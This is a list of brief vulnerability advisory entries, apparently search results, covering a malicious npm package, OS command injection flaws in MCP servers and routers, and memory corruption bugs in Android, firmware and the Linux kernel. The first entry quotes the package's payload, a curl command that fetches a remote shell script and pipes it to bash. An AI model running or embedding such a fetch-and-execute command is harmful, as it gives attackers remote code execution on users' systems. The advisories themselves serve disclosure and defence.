MAL-2026-5694 Malicious code in internallib_v856 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a The package's main entry index.js exports a single function command that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget...

CVE-2026-36045

CVE-2026-36045 affects picoclaw up to v0.1.2 (and earlier). The issue is an OS command injection in the ExecTool component (pkg/tools/shell.go) caused by an incomplete denylist in guardCommand() that attempts to restrict shell execution. The vulnerability description is consistently reported acro...

CVE-2026-7593

A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function executecommand of the file src/index.ts of the component MCP Interface. The manipulation leads to os command injection. Remote exploitation of the attack is possible. T...

CVE-2026-7593 Sunwood-ai-labs command-executor-mcp-server MCP index.ts execute_command os command injection

A security vulnerability has been detected in Sunwood-ai-labs command-executor-mcp-server up to 0.1.0. This impacts the function executecommand of the file src/index.ts of the component MCP Interface. The manipulation leads to os command injection. Remote exploitation of the attack is possible. T...

PT-2026-22594

Name of the Vulnerable Software and Affected Versions Tenda W20E version 4.0br V15.11.0.6 Description A command injection issue exists in the Tenda W20E router firmware. The firmware does not properly validate the usbPartitionName variable before using it within the doSystemCmd function. This can...

CVE-2024-26479

An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the Command execution function...

CVE-2025-61492

A command injection vulnerability in the executecommand function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input...

PT-2026-1826

Name of the Vulnerable Software and Affected Versions terminal-controller-mcp version 0.1.7 Description A command injection issue exists in the execute command function of the software. Attackers can execute arbitrary commands by providing a crafted input. The vulnerability can lead to arbitrary...

Terminal Controller for MCP 安全漏洞

Terminal Controller for MCP is a context protocol server by the individual developer GongRzhe. A security vulnerability exists in Terminal Controller for MCP version 0.1.7, which stems from a command injection in the executecommand function that could lead to the execution of arbitrary commands...

EUVD-2008-5012

Malware in sbrugna...

EUVD-2007-1953

Malware in sbrugna...

EUVD-2025-25100

Malicious code in bioql PyPI...

VulnCheck KEV: CVE-2025-45988

Blink routers BL-WR9000 V2.4.9 , BL-AC2100AZ3 V1.0.4, BL-X10AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200AT1 v1.0.0, BL-X26AC8 v1.2.8, BLAC450MAE4 v4.0.0 and BL-X26DA3 v1.2.7 were discovered to contain multiple command injection vulnerabilities via the cmd parameter in the bsSetCmd function...

CVE-2025-22408

In rfcchecksendcmd of rfcutils.cc, there is a possible way to execute arbitrary code due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation...

CVE-2025-22408

CVE-2025-22408 affects Google Android in the rfc_check_send_cmd function of rfc_utils.cc, caused by a use-after-free; this enables remote code execution with no extra privileges and without user interaction. Public documents confirm the issue as a System-level vulnerability in Android, with CVSS ...

CVE-2025-7027

Gigabyte Gigabyte UEFI SMM vulnerabilities (CVE-2025-7027) allow a local attacker to control both read and write addresses in SMRAM via the SwSmiInputValue 0xB2 handling, using an unvalidated UEFI NVRAM pointer (SetupXtuBufferAddress) and an attacker-controlled RBX-based pointer to perform arbitr...

PT-2025-26106

Name of the Vulnerable Software and Affected Versions Linux kernel affected versions not specified Description A potential off-by-one overflow issue has been identified in the Linux kernel, specifically in the il4965 rs fill link cmd function. This issue arises when the value of idx equals LINK...

CVE-2025-25343

Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the formexeCommand function...

DrayTek Vigor3900 安全漏洞

DrayTek Vigor3900 is a high-performance router for enterprise networks from China-based DrayTek. A security vulnerability exists in the DrayTek Vigor3900 v1.5.1.6, which is caused by an authenticated command injection vulnerability via the name parameter in the runcommand function...

CVE-2024-2980

A vulnerability, which was classified as critical, has been found in Tenda FH1202 1.2.0.14408. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The...